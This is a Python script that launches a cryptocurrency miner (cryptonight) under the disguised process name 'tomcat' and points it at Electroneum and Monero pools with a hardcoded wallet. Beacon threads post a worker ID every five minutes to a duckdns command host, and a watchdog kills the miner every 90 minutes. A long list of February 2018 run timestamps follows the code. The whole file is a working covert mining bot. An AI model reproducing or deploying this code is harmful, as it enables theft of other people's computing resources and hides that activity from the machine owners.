import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:22:03.319386
#2018-02-17 17:10:07.822643
#2018-02-17 18:58:01.480202
#2018-02-17 20:45:04.046270
#2018-02-17 22:32:01.311561
#2018-02-18 00:16:01.819015
#2018-02-18 02:07:06.836114
#2018-02-18 03:54:05.095428
#2018-02-18 05:43:06.291980
#2018-02-18 07:36:06.813698
#2018-02-18 09:23:03.612188
#2018-02-18 11:08:03.485421
#2018-02-18 12:55:06.015667
#2018-02-18 14:42:07.435262
#2018-02-18 16:31:03.479651
#2018-02-18 18:20:08.246915
#2018-02-18 20:07:07.262739
#2018-02-18 21:54:05.698373
#2018-02-18 23:43:01.878882
#2018-02-19 01:29:06.014639
#2018-02-19 03:18:05.270249
#2018-02-19 05:03:06.743983
#2018-02-19 06:49:01.755346
#2018-02-19 08:38:08.450481
#2018-02-19 10:27:07.094321
#2018-02-19 12:15:01.568241
#2018-02-19 14:02:04.196485
#2018-02-19 15:51:05.246174
#2018-02-19 17:39:01.686279
#2018-02-19 19:26:08.448894
#2018-02-19 21:14:04.842734
#2018-02-19 23:00:05.131863
#2018-02-20 00:43:07.107065
#2018-02-20 02:34:02.202596
#2018-02-20 04:23:07.837119
#2018-02-20 06:07:06.044671
#2018-02-20 07:52:04.008019
#2018-02-20 09:38:07.267248
#2018-02-20 11:22:09.128393
#2018-02-20 13:10:06.757473
#2018-02-20 14:54:07.112166
#2018-02-20 16:40:07.958822
#2018-02-20 18:27:06.191007
#2018-02-20 20:20:04.350753
#2018-02-20 22:05:07.519812
#2018-02-20 23:47:05.744580
#2018-02-21 01:29:07.633612
#2018-02-21 03:18:08.070630
#2018-02-21 05:07:04.003736
#2018-02-21 06:54:04.851156
#2018-02-21 08:40:08.655197
#2018-02-21 10:26:07.255786
#2018-02-21 12:13:09.682821
#2018-02-21 14:03:04.678247
#2018-02-21 15:47:06.335319
#2018-02-21 17:38:09.371541
#2018-02-21 19:25:09.280847
#2018-02-21 21:14:07.096954
#2018-02-21 23:01:07.783896
#2018-02-22 00:51:04.269724
#2018-02-22 02:40:06.293271
#2018-02-22 04:28:01.512945
#2018-02-22 06:14:05.550327
#2018-02-22 08:01:06.453939
#2018-02-22 09:49:06.232221
#2018-02-22 11:33:08.586043
#2018-02-22 13:21:07.943579
#2018-02-22 15:10:07.540660
#2018-02-22 16:53:08.827989
#2018-02-22 18:42:10.149658
#2018-02-22 20:34:04.480405
#2018-02-22 22:19:06.220640
#2018-02-23 00:07:04.248780
#2018-02-23 01:57:01.390676
#2018-02-23 03:44:03.925704
#2018-02-23 05:32:04.010525
#2018-02-23 07:16:06.464457
#2018-02-23 09:21:08.044838
#2018-02-23 11:27:04.910100
#2018-02-23 13:16:04.806541
#2018-02-23 15:01:07.481757
#2018-02-23 16:49:08.090087
#2018-02-23 18:38:08.131366
#2018-02-23 20:24:03.854195
#2018-02-23 22:11:04.406485
#2018-02-23 23:58:05.403547
#2018-02-24 01:48:06.357258
#2018-02-24 03:39:04.921118
#2018-02-24 05:23:01.284698
#2018-02-24 07:10:09.698765
#2018-02-24 08:59:07.338677
#2018-02-24 10:40:04.416093
#2018-02-24 12:29:04.159355
#2018-02-24 14:20:06.294654
#2018-02-24 16:07:07.217826
#2018-02-24 17:58:03.702289
#2018-02-24 19:46:05.313954
#2018-02-24 22:53:05.108295
#2018-02-25 03:02:04.931120
#2018-02-25 06:44:06.237854